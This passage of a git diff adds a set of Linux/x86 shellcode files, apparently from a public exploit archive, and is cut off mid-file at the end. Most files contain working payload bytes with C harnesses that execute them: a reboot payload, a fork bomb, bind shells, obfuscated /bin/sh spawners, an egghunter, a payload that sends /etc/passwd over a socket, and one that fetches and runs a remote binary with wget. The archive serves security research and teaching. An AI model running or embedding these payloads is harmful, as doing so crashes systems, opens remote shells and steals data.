+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program.  If not, see &t;http://www.gnu.org/licenses/>.
+
+*/
+
+/*
+
+   mutated_reboot_shellcode
+
+   * 55 bytes
+   * null-free
+   * mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
+  
+  
+   # gcc -m32 -fno-stack-protector -z execstack mutated_reboot_shellcode.c -o mutated_reboot_shellcode
+
+   Testing
+   * Only run it in a Virtual Machine!!! Your system will crash. Use at your own risk!
+   * To work properly, you must be su!
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+
+              "\x29\xff\x74\x01\xe8\x83\xc7\x24\x97\xeb"
+              "\x01\xe1\xcd\x80\xeb\x01\xff\x6a\x29\x59"
+              "\xeb\x01\x01\xbb\x67\x45\x23\x01\xba\xca"
+              "\x9b\xc2\xff\x31\xda\x75\x01\xe7\x87\xda"
+              "\x8d\x41\x2f\x8d\x89\x40\x19\x12\x28\xeb"
+              "\x02\xe8\x01\xcd\x80";
+
+
+main ()
+{
+
+    // When contains null bytes, printf will show a wrong shellcode length.
+
+    printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+    // Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+    __asm__ ("movl $0xffffffff, %eax\n\t"
+            "movl %eax, %ebx\n\t"
+            "movl %eax, %ecx\n\t"
+            "movl %eax, %edx\n\t"
+            "movl %eax, %esi\n\t"
+            "movl %eax, %edi\n\t"
+            "movl %eax, %ebp\n\t"
+
+            // Calling the shellcode
+            "call shellcode");
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43738.c b/shellcodes/linux_x86/43738.c
new file mode 100644
index 000000000..6248f4193
--- /dev/null
+++ b/shellcodes/linux_x86/43738.c
@@ -0,0 +1,70 @@
+/*
+
+   Mutated Fork Bomb Shellcode - C Language - Linux/x86
+   Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+   This program is free software: you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation, either version 3 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+*/
+
+/*
+
+   mutated_fork_bomb_shellcode
+
+   * 15 bytes
+   * null-free
+   * mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
+
+
+   # gcc -m32 -fno-stack-protector -z execstack mutated_fork_bomb_shellcode.c -o mutated_fork_bomb_shellcode
+
+   Testing
+   * Only run it in a Virtual Machine!!! Your system will crash. Use at your own risk!
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+
+              "\x31\xff\xeb\x01\xe8\xb2\x1d\x97\x83\xe8"
+              "\x1b\xcd\x80\xeb\xf1";
+
+
+main ()
+{
+
+    // When contains null bytes, printf will show a wrong shellcode length.
+
+    printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+    // Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+    __asm__ ("movl $0xffffffff, %eax\n\t"
+            "movl %eax, %ebx\n\t"
+            "movl %eax, %ecx\n\t"
+            "movl %eax, %edx\n\t"
+            "movl %eax, %esi\n\t"
+            "movl %eax, %edi\n\t"
+            "movl %eax, %ebp\n\t"
+
+            // Calling the shellcode
+            "call shellcode");
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43739.c b/shellcodes/linux_x86/43739.c
new file mode 100644
index 000000000..b6770f2e8
--- /dev/null
+++ b/shellcodes/linux_x86/43739.c
@@ -0,0 +1,78 @@
+/*
+
+   Mutated Execve Wget Shellcode - C Language - Linux/x86
+   Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+   This program is free software: you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation, either version 3 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+*/
+
+/*
+
+   mutated_execve_wget_shellcode
+
+   * 96 bytes
+   * null-free
+   * mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
+
+
+  # gcc -m32 -fno-stack-protector -z execstack mutated_execve_wget_shellcode.c -o mutated_execve_wget_shellcode
+
+  Testing
+  # ./mutated_execve_wget_shellcode
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+
+              "\xeb\x01\xe8\x29\xdb\x74\x01\x83\xf7\xe3"
+              "\xbd\xf5\xff\xff\xff\xeb\x01\xe8\x68\x41"
+              "\x65\x45\x72\x29\xf6\x74\x01\x83\x5e\x56"
+              "\x81\xf6\x25\x4a\x1f\x3e\x56\xeb\x01\x33"
+              "\x68\x69\x73\x2e\x67\x89\x44\x24\x0c\x89"
+              "\xe1\x6a\x74\xeb\x01\xe3\x68\x2f\x77\x67"
+              "\x65\xeb\x01\x83\x68\x2f\x62\x69\x6e\xeb"
+              "\x01\x33\x68\x2f\x75\x73\x72\x8d\x1c\x24"
+              "\xeb\x01\x83\x50\x51\x53\x89\xe1\xf7\xdd"
+              "\x95\xeb\x01\x83\xcd\x80";
+
+
+main ()
+{
+
+    // When contains null bytes, printf will show a wrong shellcode length.
+
+    printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+    // Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+    __asm__ ("movl $0xffffffff, %eax\n\t"
+            "movl %eax, %ebx\n\t"
+            "movl %eax, %ecx\n\t"
+            "movl %eax, %edx\n\t"
+            "movl %eax, %esi\n\t"
+            "movl %eax, %edi\n\t"
+            "movl %eax, %ebp\n\t"
+
+            // Calling the shellcode
+            "call shellcode");
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43740.c b/shellcodes/linux_x86/43740.c
new file mode 100644
index 000000000..da44e6edb
--- /dev/null
+++ b/shellcodes/linux_x86/43740.c
@@ -0,0 +1,82 @@
+/*
+
+   Uzumaki Decrypter Shellcode - C Language - Linux/x86
+   Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+   This program is free software: you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation, either version 3 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+*/
+
+/*
+
+   uzumaki_decrypter_shellcode
+
+   * decrypter has 29 bytes (the final amount depends on the shellcode length)
+   * it decrypts the uzumaki cipher, a custom stream cipher algorithm ( (XOR [static] and XOR [pseudorandom]), ADD [static] )
+   * to encrypt the shellcode use the Uzumaki Crypter <https://github.com/geyslan/SLAE/blob/master/7th.assignment/uzumaki_crypter.py>
+   * null-free
+
+   # gcc -m32 -fno-stack-protector -z execstack uzumaki_decrypter_shellcode.c -o uzumaki_decrypter_shellcode
+
+   Testing
+   # ./uzumaki_decrypter_shellcode
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+
+              // Shellcode Decrypter
+              "\x29\xc9\x74\x14\x5e\xb1"
+              "\x14"  // <- shellcode length
+              "\x46\x8b\x06\x83\xe8"
+              "\x09"  // <- ADD key
+              "\x34"
+              "\x9f"  // <- XOR key
+              "\x32\x46\xff\x88\x06\xe2\xf1\xeb\x05\xe8"
+              "\xe7\xff\xff\xff"
+
+              // Crypted Shellcode
+              "\x31\x70\xaa\x92\xd7\x2d\xce\xaf\xe1\xa8"
+              "\xcc\x8d\xa8\xe1\xdb\x9d\xa1\x81\xfe\xba"
+              "\xdb";
+
+
+main ()
+{
+
+    // When contains null bytes, printf will show a wrong shellcode length.
+
+    printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+    // Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+    __asm__ ("movl $0xffffffff, %eax\n\t"
+            "movl %eax, %ebx\n\t"
+            "movl %eax, %ecx\n\t"
+            "movl %eax, %edx\n\t"
+            "movl %eax, %esi\n\t"
+            "movl %eax, %edi\n\t"
+            "movl %eax, %ebp\n\t"
+
+            // Calling the shellcode
+            "call shellcode");
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43742.c b/shellcodes/linux_x86/43742.c
new file mode 100644
index 000000000..668800492
--- /dev/null
+++ b/shellcodes/linux_x86/43742.c
@@ -0,0 +1,100 @@
+/*
+
+Title   : tcpbindshell  (108 bytes)
+Date    : 15 May 2013
+Author  : Russell Willis <codinguy@gmail.com>
+Testd on: Linux/x86 (SMP Debian 3.2.41-2 i686)
+
+$ objdump -D tcpbindshell -M intel
+
+tcpbindshell:     file format elf32-i386
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:   31 c0                   xor    eax,eax
+ 8048062:   31 db                   xor    ebx,ebx
+ 8048064:   31 c9                   xor    ecx,ecx
+ 8048066:   31 d2                   xor    edx,edx
+ 8048068:   b0 66                   mov    al,0x66
+ 804806a:   b3 01                   mov    bl,0x1
+ 804806c:   51                      push   ecx
+ 804806d:   6a 06                   push   0x6
+ 804806f:   6a 01                   push   0x1
+ 8048071:   6a 02                   push   0x2
+ 8048073:   89 e1                   mov    ecx,esp
+ 8048075:   cd 80                   int    0x80
+ 8048077:   89 c6                   mov    esi,eax
+ 8048079:   b0 66                   mov    al,0x66
+ 804807b:   b3 02                   mov    bl,0x2
+ 804807d:   52                      push   edx
+ 804807e:   66 68 7a 69             pushw  0x697a
+ 8048082:   66 53                   push   bx
+ 8048084:   89 e1                   mov    ecx,esp
+ 8048086:   6a 10                   push   0x10
+ 8048088:   51                      push   ecx
+ 8048089:   56                      push   esi
+ 804808a:   89 e1                   mov    ecx,esp
+ 804808c:   cd 80                   int    0x80
+ 804808e:   b0 66                   mov    al,0x66
+ 8048090:   b3 04                   mov    bl,0x4
+ 8048092:   6a 01                   push   0x1
+ 8048094:   56                      push   esi
+ 8048095:   89 e1                   mov    ecx,esp
+ 8048097:   cd 80                   int    0x80
+ 8048099:   b0 66                   mov    al,0x66
+ 804809b:   b3 05                   mov    bl,0x5
+ 804809d:   52                      push   edx
+ 804809e:   52                      push   edx
+ 804809f:   56                      push   esi
+ 80480a0:   89 e1                   mov    ecx,esp
+ 80480a2:   cd 80                   int    0x80
+ 80480a4:   89 c3                   mov    ebx,eax
+ 80480a6:   31 c9                   xor    ecx,ecx
+ 80480a8:   b1 03                   mov    cl,0x3
+080480aa <dupfd>:
+ 80480aa:   fe c9                   dec    cl
+ 80480ac:   b0 3f                   mov    al,0x3f
+ 80480ae:   cd 80                   int    0x80
+ 80480b0:   75 f8                   jne    80480aa 
+ 80480b2:   31 c0                   xor    eax,eax
+ 80480b4:   52                      push   edx
+ 80480b5:   68 6e 2f 73 68          push   0x68732f6e
+ 80480ba:   68 2f 2f 62 69          push   0x69622f2f
+ 80480bf:   89 e3                   mov    ebx,esp
+ 80480c1:   52                      push   edx
+ 80480c2:   53                      push   ebx
+ 80480c3:   89 e1                   mov    ecx,esp
+ 80480c5:   52                      push   edx
+ 80480c6:   89 e2                   mov    edx,esp
+ 80480c8:   b0 0b                   mov    al,0xb
+ 80480ca:   cd 80                   int    0x80
+*/
+
+#include <stdio.h>
+
+/* 
+ Port High/Low bytes
+ Current port 31337 (7a69)
+*/
+#define PORTHL "\x7a\x69"
+
+unsigned char code[] = 
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66"
+"\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89"
+"\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52"
+"\x66\x68"PORTHL"\x66\x53\x89\xe1\x6a\x10"
+"\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04"
+"\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3"
+"\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3"
+"\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
+"\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68"
+"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
+"\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
+
+main()
+{
+    printf("Shellcode Length: %d\n", sizeof(code)-1);
+    int (*ret)() = (int(*)())code;
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43743.c b/shellcodes/linux_x86/43743.c
new file mode 100644
index 000000000..a142b2bca
--- /dev/null
+++ b/shellcodes/linux_x86/43743.c
@@ -0,0 +1,69 @@
+/*
+    In The Name of G0D
+    
+    Linux/x86 - Set '/proc/sys/net/ipv4/ip_forward' to '0' & exit() 
+    Size : 83 Bytes
+    
+    fun for routers ;)
+    
+    Author : By Hamid Zamani (aka HAMIDx9)
+    Member of ^^Ashiyane Digital Security Team^^
+    
+
+Disassembly of section .text:
+
+08048054 <_start>:
+ 8048054:   31 c0                   xor    %eax,%eax
+ 8048056:   50                      push   %eax
+ 8048057:   68 77 61 72 64          push   $0x64726177
+ 804805c:   68 5f 66 6f 72          push   $0x726f665f
+ 8048061:   68 34 2f 69 70          push   $0x70692f34
+ 8048066:   68 2f 69 70 76          push   $0x7670692f
+ 804806b:   68 2f 6e 65 74          push   $0x74656e2f
+ 8048070:   68 73 79 73 2f          push   $0x2f737973
+ 8048075:   68 72 6f 63 2f          push   $0x2f636f72
+ 804807a:   66 68 2f 70             pushw  $0x702f
+ 804807e:   89 e3                   mov    %esp,%ebx
+ 8048080:   31 c9                   xor    %ecx,%ecx
+ 8048082:   b1 01                   mov    $0x1,%cl
+ 8048084:   b0 05                   mov    $0x5,%al
+ 8048086:   cd 80                   int    $0x80
+ 8048088:   89 c3                   mov    %eax,%ebx
+ 804808a:   31 c9                   xor    %ecx,%ecx
+ 804808c:   51                      push   %ecx
+ 804808d:   6a 30                   push   $0x30
+ 804808f:   89 e1                   mov    %esp,%ecx
+ 8048091:   31 d2                   xor    %edx,%edx
+ 8048093:   b2 01                   mov    $0x1,%dl
+ 8048095:   b0 04                   mov    $0x4,%al
+ 8048097:   cd 80                   int    $0x80
+ 8048099:   31 c0                   xor    %eax,%eax
+ 804809b:   83 c0 06                add    $0x6,%eax
+ 804809e:   cd 80                   int    $0x80
+ 80480a0:   31 c0                   xor    %eax,%eax
+ 80480a2:   40                      inc    %eax
+ 80480a3:   31 db                   xor    %ebx,%ebx
+ 80480a5:   cd 80                   int    $0x80
+*/
+
+#include <stdio.h>
+
+int main(int argc,char **argv)
+{
+
+char shellcode[] = "\x31\xc0\x50\x68\x77\x61\x72\x64\x68"
+                   "\x5f\x66\x6f\x72\x68\x34\x2f\x69\x70"
+                   "\x68\x2f\x69\x70\x76\x68\x2f\x6e\x65"
+                   "\x74\x68\x73\x79\x73\x2f\x68\x72\x6f"
+                   "\x63\x2f\x66\x68\x2f\x70\x89\xe3\x31"
+                   "\xc9\xb1\x01\xb0\x05\xcd\x80\x89\xc3"
+                   "\x31\xc9\x51\x6a\x30\x89\xe1\x31\xd2"
+                   "\xb2\x01\xb0\x04\xcd\x80\x31\xc0\x83"
+                   "\xc0\x06\xcd\x80\x31\xc0\x40\x31\xdb"
+                   "\xcd\x80";
+                   
+     printf("Length: %d\n",strlen(shellcode));
+     (*(void(*)()) shellcode)();
+     
+     return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43744.c b/shellcodes/linux_x86/43744.c
new file mode 100644
index 000000000..8fb01759a
--- /dev/null
+++ b/shellcodes/linux_x86/43744.c
@@ -0,0 +1,59 @@
+/*
+Title   : egghunter shellcode
+        : hunter (30 bytes), marker (8 bytes), shellcode (28 bytes)
+Date    : 28 May 2013
+Author  : Russell Willis <codinguy@gmail.com>
+Testd on: Linux/x86 (SMP Debian 3.2.41-2 i686)
+
+Comments:
+    Using sigaction system call for hunter code for robust operation.
+    Based on paper 'Safely Searching Process Virtual Address Space'.
+    This is a must read paper, instructive and inspiring, found here:
+    http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
+    see section 3.1.3 sigaction(2), page 13.
+    
+    To build:
+    gcc -fno-stack-protector -z execstack egghunter.c -o egghunter
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+/*
+ * Marker code must be executable, currently:
+ *   /x90 nop
+ *   /x50 push eax
+ */ 
+#define MARKER "\x90\x50" 
+
+char hunter[] = 
+    "\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1"
+    "\xb8"MARKER""MARKER"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
+char marker[] = MARKER; 
+char shellcode[] = 
+    "\x31\xc0\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
+    "\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
+ 
+int 
+main(void) 
+{
+    int i=0, nmarkers = 4, markerlen = sizeof(marker)-1;
+    /* 
+     * Setup area of memory for testing,
+     * place marker and shellcode into area.
+     */ 
+    char *egg = malloc(128);
+    memcpy(egg+(markerlen*nmarkers), shellcode, sizeof(shellcode)-1);
+    do {
+      memcpy(egg+i, marker, markerlen);
+      i += markerlen;
+    } while(i != (markerlen * nmarkers));
+    /*
+     * Run hunter to search for marker and jump to shellcode 
+     */
+    int (*ret)() = (int(*)())hunter;
+    ret();
+    free(egg);
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43745.c b/shellcodes/linux_x86/43745.c
new file mode 100644
index 000000000..f037cb40a
--- /dev/null
+++ b/shellcodes/linux_x86/43745.c
@@ -0,0 +1,41 @@
+/*
+
+Title   : Obfuscated execve /bin/sh (30 bytes)
+Date    : 3rd July 2013
+Author  : Russell Willis <codinguy@gmail.com>
+System  : Linux/x86 (SMP Debian 3.2.41-2 i686)
+  
+To build:
+gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
+
+00000000  31C9              xor ecx,ecx
+00000002  F7E9              imul ecx
+00000004  51                push ecx
+00000005  040B              add al,0xb
+00000007  EB08              jmp short 0x11
+00000009  5E                pop esi
+0000000A  87E6              xchg esp,esi
+0000000C  99                cdq
+0000000D  87DC              xchg ebx,esp
+0000000F  CD80              int 0x80
+00000011  E8F3FFFFFF        call dword 0x9
+00000016  2F                das
+00000017  62696E            bound ebp,[ecx+0x6e]
+0000001A  2F                das
+0000001B  2F                das
+0000001C  7368              jnc 0x86
+
+*/
+
+#include <stdio.h>
+ 
+unsigned char code[] = \
+"\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80"
+"\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
+ 
+main()
+{
+    printf("Shellcode Length: %d\n", sizeof(code)-1);
+    int (*ret)() = (int(*)())code;
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43746.c b/shellcodes/linux_x86/43746.c
new file mode 100644
index 000000000..8ab326bd9
--- /dev/null
+++ b/shellcodes/linux_x86/43746.c
@@ -0,0 +1,90 @@
+/*
+
+Title   : Obfuscated tcp bind shell (112 bytes)
+Date    : 3 July 2013
+Author  : Russell Willis <codinguy@gmail.com>
+System  : Linux/x86 (SMP Debian 3.2.41-2 i686)
+
+To build:
+gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+    
+00000000  D9EE              fldz
+00000002  9BD97424F4        fstenv [esp-0xc]
+00000007  5D                pop ebp
+00000008  8D6D59            lea ebp,[ebp+0x59]
+0000000B  31DB              xor ebx,ebx
+0000000D  F7EB              imul ebx
+0000000F  FEC3              inc bl
+00000011  51                push ecx
+00000012  6A06              push byte +0x6
+00000014  6A01              push byte +0x1
+00000016  6A02              push byte +0x2
+00000018  FFD5              call ebp
+0000001A  89C6              mov esi,eax
+0000001C  FEC3              inc bl
+0000001E  52                push edx
+0000001F  66687A69          push word 0x697a
+00000023  6653              push bx
+00000025  89E1              mov ecx,esp
+00000027  6A10              push byte +0x10
+00000029  51                push ecx
+0000002A  56                push esi
+0000002B  FFD5              call ebp
+0000002D  B304              mov bl,0x4
+0000002F  6A01              push byte +0x1
+00000031  56                push esi
+00000032  FFD5              call ebp
+00000034  B305              mov bl,0x5
+00000036  52                push edx
+00000037  52                push edx
+00000038  56                push esi
+00000039  FFD5              call ebp
+0000003B  89C3              mov ebx,eax
+0000003D  31C9              xor ecx,ecx
+0000003F  B103              mov cl,0x3
+00000041  FEC9              dec cl
+00000043  B03F              mov al,0x3f
+00000045  CD80              int 0x80
+00000047  75F8              jnz 0x41
+00000049  31DB              xor ebx,ebx
+0000004B  F7E3              mul ebx
+0000004D  51                push ecx
+0000004E  EB13              jmp short 0x63
+00000050  5E                pop esi
+00000051  87E6              xchg esp,esi
+00000053  87DC              xchg ebx,esp
+00000055  B00B              mov al,0xb
+00000057  CD80              int 0x80
+00000059  5F                pop edi
+0000005A  6A66              push byte +0x66
+0000005C  58                pop eax
+0000005D  89E1              mov ecx,esp
+0000005F  CD80              int 0x80
+00000061  57                push edi
+00000062  C3                ret
+00000063  E8E8FFFFFF        call dword 0x50
+00000068  2F                das
+00000069  62696E            bound ebp,[ecx+0x6e]
+0000006C  2F                das
+0000006D  2F                das
+0000006E  7368              jnc 0xd8
+*/
+
+#include <stdio.h>
+
+unsigned char code[] = \
+"\xd9\xee\x9b\xd9\x74\x24\xf4\x5d\x8d\x6d\x59\x31\xdb\xf7"
+"\xeb\xfe\xc3\x51\x6a\x06\x6a\x01\x6a\x02\xff\xd5\x89\xc6"
+"\xfe\xc3\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51"
+"\x56\xff\xd5\xb3\x04\x6a\x01\x56\xff\xd5\xb3\x05\x52\x52"
+"\x56\xff\xd5\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd"
+"\x80\x75\xf8\x31\xdb\xf7\xe3\x51\xeb\x13\x5e\x87\xe6\x87"
+"\xdc\xb0\x0b\xcd\x80\x5f\x6a\x66\x58\x89\xe1\xcd\x80\x57"
+"\xc3\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
+
+main()
+{
+    printf("Shellcode Length: %d\n", sizeof(code)-1);
+    int (*ret)() = (int(*)())code;
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43747.c b/shellcodes/linux_x86/43747.c
new file mode 100644
index 000000000..c12a418e8
--- /dev/null
+++ b/shellcodes/linux_x86/43747.c
@@ -0,0 +1,98 @@
+/*
+; Author: Daniel Sauder
+; Website: http://govolution.wordpress.com/about
+; License http://creativecommons.org/licenses/by-sa/3.0/
+
+; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345. 
+; The file can be recieved using netcat:
+; $ nc -l 127.1.1.1 12345
+
+section .text
+
+global _start
+
+_start:
+    ; socket
+    push BYTE 0x66    ; socketcall 102
+    pop eax
+    xor ebx, ebx 
+    inc ebx 
+    xor edx, edx
+    push edx 
+    push BYTE 0x1
+    push BYTE 0x2
+    mov ecx, esp
+    int 0x80
+    mov esi, eax
+
+    ; connect
+    push BYTE 0x66 
+    pop eax
+    inc ebx
+    push DWORD 0x0101017f  ;127.1.1.1
+    push WORD 0x3930  ; Port 12345
+    push WORD bx
+    mov ecx, esp
+    push BYTE 16
+    push ecx
+    push esi
+    mov ecx, esp
+    inc ebx
+    int 0x80
+
+    ; dup2
+    mov esi, eax
+    push BYTE 0x1
+    pop ecx
+    mov BYTE al, 0x3F
+    int 0x80
+    
+    ;read the file
+    jmp short call_shellcode
+    
+shellcode:
+    push 0x5
+    pop eax
+    pop ebx
+    xor ecx,ecx
+    int 0x80
+    mov ebx,eax
+    mov al,0x3
+    mov edi,esp
+    mov ecx,edi
+    xor edx,edx
+    mov dh,0xff
+    mov dl,0xff
+    int 0x80
+    mov edx,eax
+    push 0x4
+    pop eax
+    mov bl, 0x1
+    int 0x80
+    push 0x1
+    pop eax
+    inc ebx
+    int 0x80
+    
+call_shellcode:
+    call shellcode
+    message db "/etc/passwd"
+    
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+main()
+{
+
+    printf("Shellcode Length:  %d\n", strlen(code));
+
+    int (*ret)() = (int(*)())code;
+
+    ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43748.c b/shellcodes/linux_x86/43748.c
new file mode 100644
index 000000000..e48f89a84
--- /dev/null
+++ b/shellcodes/linux_x86/43748.c
@@ -0,0 +1,95 @@
+/*
+; Filename: downloadexec.nasm
+; Author: Daniel Sauder
+; Website: http://govolution.wordpress.com/
+; Tested on: Ubuntu 12.04 / 32Bit
+; License: http://creativecommons.org/licenses/by-sa/3.0/
+
+; Shellcode:
+; - download 192.168.2.222/x with wget
+; - chmod x
+; - execute x
+; - x is an executable
+; - length 108 bytes
+
+global _start
+
+section .text
+
+_start:
+
+    ;fork
+    xor eax,eax
+    mov al,0x2
+    int 0x80
+    xor ebx,ebx
+    cmp eax,ebx
+    jz child
+  
+    ;wait(NULL)
+    xor eax,eax
+    mov al,0x7
+    int 0x80
+        
+    ;chmod x
+    xor ecx,ecx
+    xor eax, eax
+    push eax
+    mov al, 0xf
+    push 0x78
+    mov ebx, esp
+    xor ecx, ecx
+    mov cx, 0x1ff
+    int 0x80
+    
+    ;exec x
+    xor eax, eax
+    push eax
+    push 0x78
+    mov ebx, esp
+    push eax
+    mov edx, esp
+    push ebx
+    mov ecx, esp
+    mov al, 11
+    int 0x80
+    
+child:
+    ;download 192.168.2.222//x with wget
+    push 0xb
+    pop eax
+    cdq
+    push edx
+    
+    push 0x782f2f32 ;2//x avoid null byte
+    push 0x32322e32 ;22.2
+    push 0x2e383631 ;.861
+    push 0x2e323931 ;.291
+    mov ecx,esp
+    push edx
+    
+    push 0x74 ;t
+    push 0x6567772f ;egw/
+    push 0x6e69622f ;nib/
+    push 0x7273752f ;rsu/
+    mov ebx,esp
+    push edx
+    push ecx
+    push ebx
+    mov ecx,esp
+    int 0x80
+    
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\x68\x32\x2f\x2f\x78\x68\x32\x2e\x32\x32\x68\x31\x36\x38\x2e\x68\x31\x39\x32\x2e\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+main()
+{
+    printf("Shellcode Length:  %d\n", strlen(code));
+    int (*ret)() = (int(*)())code;
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43749.asm b/shellcodes/linux_x86/43749.asm
new file mode 100644
index 000000000..c6e2cdfe6
--- /dev/null
+++ b/shellcodes/linux_x86/43749.asm
@@ -0,0 +1,41 @@
+;Description:  JMP-CALL-POP execve shell (52 bytes)
+;Shellcode:    \xeb\x25\x5e\x89\xf7\x31\xc0\x50\x89\xe2\x50\x83\xc4\x03\x8d\x76\x04\x33\x06\x50\x31\xc0\x33\x07\x50\x89\xe3\x31\xc0\x50\x8d\x3b\x57\x89\xe1\xb0\x0b\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68
+;Author:       Paolo Stivanin <https://github.com/polslinux>
+;SLAE ID:      526 
+
+global _start
+
+section .text
+_start:
+    jmp short here
+
+me:
+    pop esi
+    mov edi,esi
+    
+    xor eax,eax
+    push eax
+    mov edx,esp
+    
+    push eax
+    add esp,3
+    lea esi,[esi +4]
+    xor eax,[esi]
+    push eax
+    xor eax,eax
+    xor eax,[edi]
+    push eax
+    mov ebx,esp 
+
+    xor eax,eax
+    push eax
+    lea edi,[ebx]
+    push edi
